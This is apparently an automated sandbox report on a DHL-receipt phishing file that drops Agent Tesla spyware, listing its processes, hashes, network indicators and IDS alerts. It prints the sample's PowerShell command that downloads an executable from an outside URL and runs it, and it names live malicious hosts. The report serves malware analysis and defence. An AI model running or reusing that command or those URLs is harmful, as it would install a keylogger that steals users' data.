analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dhl_receipt_receipt_sofia.mht

Full analysis: https://app.any.run/tasks/b4613e10-6c79-447f-8098-ee649282ef6f
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: July 17, 2019, 11:32:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
autoit
keylogger
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

ABB4D022686FA1836E4B992F09AB2E72

SHA1:

A2D700F2A247F86D417C74CE7A5241FB92891890

SHA256:

7BAD8B7FEB1C0022F724BB75B403740F2E60EA3343ADCF7F693DD4D65AA48BF9

SSDEEP:

6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ93rWNmdofTQNZ8vn:4Q0AQQYf2j3VTr93rsnfTQNav

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3044)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2176)
    • Application was dropped or rewritten from another process

      • vnnv.exe (PID: 3268)
      • brk.exe (PID: 2916)
      • brk.exe (PID: 2604)
    • AGENTTESLA was detected

      • RegSvcs.exe (PID: 3072)
  • SUSPICIOUS

    • Executed via COM

      • mshta.exe (PID: 3356)
      • DllHost.exe (PID: 3220)
    • Executes scripts

      • vnnv.exe (PID: 3268)
    • Drop AutoIt3 executable file

      • vnnv.exe (PID: 3268)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3044)
      • vnnv.exe (PID: 3268)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3356)
    • Creates files in the user directory

      • powershell.exe (PID: 3044)
    • Application launched itself

      • brk.exe (PID: 2916)
    • Reads Windows Product ID

      • RegSvcs.exe (PID: 3072)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3364)
      • iexplore.exe (PID: 3596)
      • iexplore.exe (PID: 3788)
    • Reads Microsoft Office registry keys

      • iexplore.exe (PID: 3364)
    • Reads internet explorer settings

      • mshta.exe (PID: 3356)
      • iexplore.exe (PID: 3596)
      • iexplore.exe (PID: 3788)
    • Creates files in the user directory

      • iexplore.exe (PID: 3788)
    • Changes internet zones settings

      • iexplore.exe (PID: 3364)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3364)
    • Application launched itself

      • iexplore.exe (PID: 3364)
    • Dropped object may contain Bitcoin addresses

      • vnnv.exe (PID: 3268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
12
Malicious processes
3
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe no specs iexplore.exe mshta.exe cmd.exe no specs powershell.exe vnnv.exe PhotoViewer.dll no specs wscript.exe no specs brk.exe no specs brk.exe no specs #AGENTTESLA regsvcs.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3364"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\dhl_receipt_receipt_sofia.mhtC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3596"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3788"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:137473C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3356C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2176"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','%temp%\vnnv.exe'); Start '%temp%\vnnv.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3044powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','C:\Users\admin\AppData\Local\Temp\vnnv.exe'); Start 'C:\Users\admin\AppData\Local\Temp\vnnv.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3268"C:\Users\admin\AppData\Local\Temp\vnnv.exe" C:\Users\admin\AppData\Local\Temp\vnnv.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3220C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1672"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\61346614\add.vbs" C:\Windows\System32\WScript.exevnnv.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2916"C:\Users\admin\AppData\Local\Temp\61346614\brk.exe" snb=uiwC:\Users\admin\AppData\Local\Temp\61346614\brk.exeWScript.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 4
Total events
2 137
Read events
1 902
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
65
Unknown types
6

Dropped files

PID
Process
Filename
Type
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3788iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:0BECF2F991661E5C679568C79216E0BE
SHA256:01154F3F8A90378911859430F58B078503E58532B44AA57BB4F7122CB3735AFA
3596iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071720190718\index.datdat
MD5:FA65EB20A031F0927689F0C3A5E202D3
SHA256:1A99DFFD91E1E8D0A4953EC51C2DE75D207B70DAB7E5DEDCFEA62110E5998A57
3596iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkE7F2.tmptext
MD5:5802850DF1DF6128C5AF93230BC19CD4
SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8
3788iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:6CA9752A59010A03AB29B106C00DE194
SHA256:0FC70631B554426848FC64AC3DCC4611775CA7B9F8BBC7921DF346B6D66C7FAD
3788iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071720190718\index.datdat
MD5:9A8553ED6380746E6B4D42F3682F5F66
SHA256:F801C74F3E6752756978B2FBB0F99879830A4F519A07A78F1929DD620A85613C
3596iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkE698.tmptext
MD5:5802850DF1DF6128C5AF93230BC19CD4
SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8
3356mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\dhl_receipt_receipt_sofia[1].htahtml
MD5:FD9AF6BBDDBC3F7A7457FC9373DF5FCD
SHA256:030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F
3788iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SJ2B48XV\dhl_receipt_receipt_sofia[1].htahtml
MD5:FD9AF6BBDDBC3F7A7457FC9373DF5FCD
SHA256:030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3788
iexplore.exe
GET
200
94.156.77.35:80
http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta
BG
html
5.84 Kb
suspicious
3356
mshta.exe
GET
200
94.156.77.35:80
http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta
BG
html
5.84 Kb
suspicious
3044
powershell.exe
GET
200
103.1.208.220:80
http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe
VN
executable
1.50 Mb
suspicious
3364
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3364
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3356
mshta.exe
94.156.77.35:80
elkom.express
Neterra Ltd.
BG
suspicious
3788
iexplore.exe
94.156.77.35:80
elkom.express
Neterra Ltd.
BG
suspicious
3044
powershell.exe
103.1.208.220:80
jpf.edu.vn
CHT Compamy Ltd
VN
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
elkom.express
  • 94.156.77.35
suspicious
jpf.edu.vn
  • 103.1.208.220
suspicious

Threats

PID
Process
Class
Message
3788
iexplore.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3788
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
3788
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding
3788
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of document.write % Encoding
3788
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of parseInt % Encoding
3788
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of unescape % Encoding
3356
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3356
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3356
mshta.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
3356
mshta.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding
No debug info